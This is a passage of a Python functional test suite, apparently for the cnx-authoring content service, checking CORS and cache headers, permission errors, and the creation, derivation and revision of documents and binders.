self.assertEqual(response.headers['Access-Control-Allow-Methods'],
'GET, OPTIONS, PUT, POST')
cache_header_dictionary = {
'201 Created':
['max-age=0, must-revalidate, no-cache, no-store, public'],
'200 OK':
['max-age=0, must-revalidate, no-cache, no-store, public'],
'400 Bad Request': [],
'302 Found': [],
'401 Unauthorized': [],
'403 Forbidden': [],
'404 Not Found': [],
}
try:
expected_cache_header = cache_header_dictionary[response.status]
except KeyError:
expected_cache_header = "NO EXPECTED CACHE HEADER"
actual_cache_header = response.headers.getall('Cache-Control')
if cache_message_special_case:
self.assertEqual(actual_cache_header, cache_message_special_case)
else:
self.assertEqual(actual_cache_header, expected_cache_header)
class FunctionalTests(BaseFunctionalTestCase):
def test_options(self):
self.testapp.options('/', status=404)
self.testapp.options('/some-random.html', status=404)
urls = ['/*', '/login', '/logout', '/callback',
'/contents/uuid@draft.json', '/resources/hash',
'/contents', '/resources', '/users/search',
'/users/profile', '/users/contents', '/users/contents/search']
for url in urls:
response = self.testapp.options(url, status=200)
self.assert_cors_headers(
response, cache_message_special_case=['public'])
self.assertEqual(response.headers['Content-Length'], '0')
def test_get_content_401(self):
self.logout()
response = self.testapp.get('/contents/1234abcde@draft.json',
status=401)
self.assert_cors_headers(response)
def test_get_content_404(self):
response = self.testapp.get('/contents/1234abcde@draft.json',
status=404)
self.assert_cors_headers(response)
def test_get_content_403(self):
response = self.testapp.post_json(
'/users/contents',
{'title': 'My New Document'}, status=201)
content = response.json
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(
'/contents/{}@draft.json'
.format(content['id']), status=403)
self.assertTrue('You do not have permission to view'
in response.body.decode('utf-8'))
response = self.testapp.post_json('/users/contents', {
'title': 'My New Binder',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
content = response.json
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.get(
'/contents/{}@draft.json'
.format(content['id']), status=403)
self.assertTrue('You do not have permission to view'
in response.body.decode('utf-8'))
def test_get_content_for_document(self):
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', {
'title': 'My New Document',
'created': u'2014-03-13T15:21:15-05:00',
'revised': u'2014-03-13T15:21:15-05:00',
}, status=201)
put_result = response.json
response = self.testapp.get('/contents/{}@draft.json'.format(
put_result['id']), status=200)
get_result = response.json
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(get_result, {
u'id': get_result['id'],
u'title': u'My New Document',
u'containedIn': [],
u'content': u'',
u'created': get_result['created'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'revised': get_result['revised'],
u'mediaType': u'application/vnd.org.cnx.module',
u'language': u'en',
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'abstract': u'',
u'version': u'draft',
u'subjects': [],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'keywords': [],
u'state': u'Draft',
u'publication': None,
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'translators': [],
u'editors': [],
u'illustrators': [],
u'printStyle': None,
})
self.assertEqual(put_result, get_result)
self.assert_cors_headers(response)
def test_post_content_401(self):
self.logout()
response = self.testapp.post('/users/contents', status=401)
self.assert_cors_headers(response)
def test_post_content_403(self):
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'}, status=403)
self.assert_cors_headers(response)
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=403)
self.assert_cors_headers(response)
def test_post_content_invalid_json(self):
response = self.testapp.post(
'/users/contents', 'invalid json', status=400)
self.assertTrue('Invalid JSON' in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_post_content_empty(self):
response = self.testapp.post_json(
'/users/contents', {}, status=400)
self.assertEqual(response.json, {
u'title': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_empty_binder(self):
response = self.testapp.post_json('/users/contents', {
'mediaType': 'application/vnd.org.cnx.collection',
}, status=400)
self.assertEqual(response.json, {
u'title': u'Required',
u'tree': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_unknown_media_type(self):
response = self.testapp.post_json('/users/contents', {
'mediaType': 'unknown-media-type',
}, status=400)
self.assertEqual(response.json, {
u'media_type': u'"unknown-media-type" is not one of '
u'application/vnd.org.cnx.module, '
u'application/vnd.org.cnx.collection',
u'title': u'Required',
})
self.assert_cors_headers(response)
def test_post_content_minimal(self):
response = self.testapp.post_json(
'/users/contents',
{'title': u'My document タイトル'}, status=201)
result = response.json
self.assertEqual(result['title'], u'My document タイトル')
self.assertEqual(result['language'], u'en')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_document_printStyle(self):
response = self.testapp.post_json(
'/users/contents',
{
'title': u'My document タイトル',
'printStyle': u'pdf print style string'
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My document タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['printStyle'], 'pdf print style string')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_minimal_binder(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'title': result['title'],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'title': result['title'],
})
self.assert_cors_headers(response)
def test_post_content_minimal_binder_with_printStyle(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
'printStyle': "*PDF print style*"
}, status=201)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'title': result['title'],
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
})
self.assertEqual(result['printStyle'], '*PDF print style*')
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertEqual(result['title'], u'My book タイトル')
self.assertEqual(result['language'], u'en')
self.assertEqual(result['tree'], {
u'contents': [],
u'id': '{}@draft'.format(result['id']),
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
u'title': result['title'],
})
self.assertEqual(result['printStyle'], '*PDF print style*')
self.assert_cors_headers(response)
def test_post_content_binder_document_not_found(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': 'page@draft',
'title': 'Page one',
},
],
},
}, status=400)
self.assert_cors_headers(response)
self.assertTrue('Document Not Found: page@draft' in
response.body.decode('utf-8'))
def test_post_content_multiple(self):
post_data = [
{'title': u'My document タイトル 1'},
{'title': u'My document タイトル 2'},
]
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
self.assertEqual(len(result), 2)
self.assertEqual(result[0]['title'], u'My document タイトル 1')
self.assertEqual(result[1]['title'], u'My document タイトル 2')
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result[0]['id']), status=200)
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result[1]['id']), status=200)
self.assert_cors_headers(response)
def test_post_content_derived_from_not_found(self):
post_data = {'derivedFrom': u'notfound@1'}
response = self.testapp.post_json(
'/users/contents', post_data, status=400)
self.assertTrue(b'Derive failed' in response.body)
self.assert_cors_headers(response)
def test_post_content_derived_from_no_version(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(content.startswith('<html'))
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertNotIn('2011-10-05', result.pop('created'))
self.assertNotIn('2011-10-12', result.pop('revised'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': '{}@1'.format(post_data['derivedFrom']),
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}@1'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': '{}@1'.format(post_data['derivedFrom']),
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}@1'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_derived_from(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
# Create the derived content
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(content.startswith('<html'))
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertNotIn('2011-10-05', result.pop('created'))
self.assertNotIn('2011-10-12', result.pop('revised'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'Indkøb',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of Indkøb',
u'abstract': u'<div xmlns="http://www.w3.org/1999/xhtml">foo</div>',
u'language': u'da',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_derived_from_w_missing_resource(self):
post_data = {
'derivedFrom': u'a3f7c934-2a89-4baf-a9a9-a89d957586d2@1',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
content = result.pop('content')
self.assertTrue(u'missing resource' in content)
self.assertTrue(content.startswith('<html'))
self.assertFalse('2011-10-12' in result.pop('created'))
self.assertTrue(result.pop('revised') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'missing resource',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of missing resource',
u'abstract': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get('/contents/{}@draft.json'.format(
result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'missing resource' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'missing resource',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of missing resource',
u'abstract': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_post_content_derived_from_binder(self):
post_data = {
'derivedFrom': u'a733d0d2-de9b-43f9-8aa9-f0895036899e@1.1',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
self.assertTrue(result.pop('revised') is not None)
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('abstract') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date[u'assignmentDate'] = unicode(
now.astimezone(TZINFO).isoformat())
expected = {
u'areContainedPublishable': False,
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'title': u'Copy of <span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'printStyle': None,
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'subjects': [],
u'tree': {
u'id': u'{}@draft'.format(result['id']),
u'title': u'Copy of <span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [
{u'id': u'209deb1f-1a46-4369-9e0d-18674cf58a3e@7',
u'title': u'Preface'},
{u'id': u'8a11a2f3-0099-55ef-87bf-9725214fcd8a@1.1',
u'title': u'Introduction: The Nature of Science and Physics',
u'contents': [
{u'id': u'f3c9ab70-a916-4d8c-9256-42953287b4e9@3',
u'title': u'Introduction to Science and the Realm of Physics, Physical Quantities, and Units'},
{u'id': u'd395b566-5fe3-4428-bcb2-19016e3aa3ce@4',
u'title': u'Physics: An Introduction'},
{u'id': u'c8bdbabc-62b1-4a5f-b291-982ab25756d7@6',
u'title': u'Physical Quantities and Units'},
{u'id': u'5152cea8-829a-4aaf-bcc5-c58a416ecb66@7',
u'title': u'Accuracy, Precision, and Significant Figures'},
{u'id': u'5838b105-41cd-4c3d-a957-3ac004a48af3@5',
u'title': u'Approximation'}]},
{u'id': u'd8bd3fb3-7b7b-5cee-9f2d-839e76638459@1.1',
u'title': u"Further Applications of Newton's Laws: Friction, Drag, and Elasticity",
u'contents': [
{u'id': u'24a2ed13-22a6-47d6-97a3-c8aa8d54ac6d@2',
u'title': u'Introduction: Further Applications of Newton\u2019s Laws'},
{u'id': u'ea271306-f7f2-46ac-b2ec-1d80ff186a59@5',
u'title': u'Friction'},
{u'id': u'26346a42-84b9-48ad-9f6a-62303c16ad41@6',
u'title': u'Drag Forces'},
{u'id': u'56f1c5c1-4014-450d-a477-2121e276beca@8',
u'title': u'Elasticity: Stress and Strain'}]},
{u'id': u'f6024d8a-1868-44c7-ab65-45419ef54881@3',
u'title': u'Atomic Masses'},
{u'id': u'7250386b-14a7-41a2-b8bf-9e9ab872f0dc@2',
u'title': u'Selected Radioactive Isotopes'},
{u'id': u'c0a76659-c311-405f-9a99-15c71af39325@5',
u'title': u'Useful Inf\xf8rmation'},
{u'id': u'ae3e18de-638d-4738-b804-dc69cd4db3a3@4',
u'title': u'Glossary of Key Symbols and Notation'}]},
}
self.assertEqual(result, expected)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertTrue(result.pop('abstract') is not None)
self.assertEqual(result, expected)
self.assert_cors_headers(response)
def test_post_content_revision_403(self):
self.logout()
self.login('user2')
post_data = {
'id': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=403)
def test_post_content_revision_404(self):
post_data = {
'id': 'edf794be-28bc-4242-8ae2-b043e4dd32ef@1',
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=404)
def test_post_content_revision(self):
self.logout()
self.login('Rasmus1975')
post_data = {
'id': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u'Turning DNA through resonance',
'abstract': u'Theories on turning DNA structures',
'language': u'en',
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
now = datetime.datetime.now(TZINFO)
formatted_now = now.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2011-10-05'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
# FIXME the user info we have in archive differs from
# that here in authoring.
rasmus_user_info = {
u'firstname': u'Rasmus',
u'fullname': u'Rasmus Ruby',
u'id': u'Rasmus1975',
u'surname': u'Ruby',
u'type': u'cnx-id',
}
rasmus_role = rasmus_user_info.copy()
rasmus_role.update({
u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'requester': rasmus_user_info['id'],
u'surname': None,
u'fullname': u'Rasmus de 1975',
})
self.assertEqual(result, {
u'abstract': u'Theories on turning DNA structures',
u'authors': [rasmus_role],
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'copyrightHolders': [rasmus_role],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'editors': [],
u'id': post_data['id'].split('@')[0],
u'illustrators': [],
u'keywords': [u'DNA', u'resonance'],
u'language': u'en',
u'licensors': [rasmus_role],
u'mediaType': u'application/vnd.org.cnx.module',
u'permissions': [u'edit', u'publish', u'view'],
u'isPublishable': True,
u'publishBlockers': None,
u'publication': None,
u'publishers': [rasmus_role],
u'state': u'Draft',
u'subjects': [u'Science and Technology'],
u'submitter': rasmus_user_info,
u'title': u'Turning DNA through resonance',
u'translators': [],
u'version': u'draft',
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
content = result.pop('content')
self.assertTrue(u'Lav en madplan for den kommende uge' in content)
self.assertTrue(content.startswith('<html'))
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
self.assertEqual(result, {
u'submitter': rasmus_user_info,
u'authors': [rasmus_role],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [rasmus_role],
u'id': result['id'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'title': u'Turning DNA through resonance',
u'abstract': u'Theories on turning DNA structures',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'subjects': [u'Science and Technology'],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [u'DNA', u'resonance'],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'editors': [],
u'translators': [],
u'licensors': [rasmus_role],
u'copyrightHolders': [rasmus_role],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
# Check that resources are saved
resource_path = re.search('(/resources/[^"]*)"', content).group(1)
response = self.testapp.get(resource_path, status=200)
self.assertEqual(response.content_type, 'image/jpeg')
self.assert_cors_headers(response)
def test_post_content_revision_w_multiroles(self):
self.logout()
self.login('OpenStaxCollege')
post_data = {
'id': u'e79ffde3-7fb4-4af3-9ec8-df648b391597@7.1',
}
now = datetime.datetime.now(TZINFO)
formatted_now = unicode(now.astimezone(TZINFO).isoformat())
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
# Test the object for internal data correctness
from ..storage import storage
document = storage.get(id=result['id'])
self.assertEqual(
sorted(document.licensor_acceptance, key=lambda v: v['id']),
[{'has_accepted': True, 'id': 'OSCRiceUniversity'},
{'has_accepted': True, 'id': 'OpenStaxCollege'},
{'has_accepted': True, 'id': 'cnxcap'}])
# Test the response data
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2013-07-31'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
abstract = result.pop('abstract')
self.assertTrue('two-semester college physics book' in abstract)
keywords = result.pop('keywords')
self.assertIn('drag', keywords)
# Test the tree for contents.
tree = result.pop('tree')
flattener = cnxepub.flatten_tree_to_ident_hashes(tree)
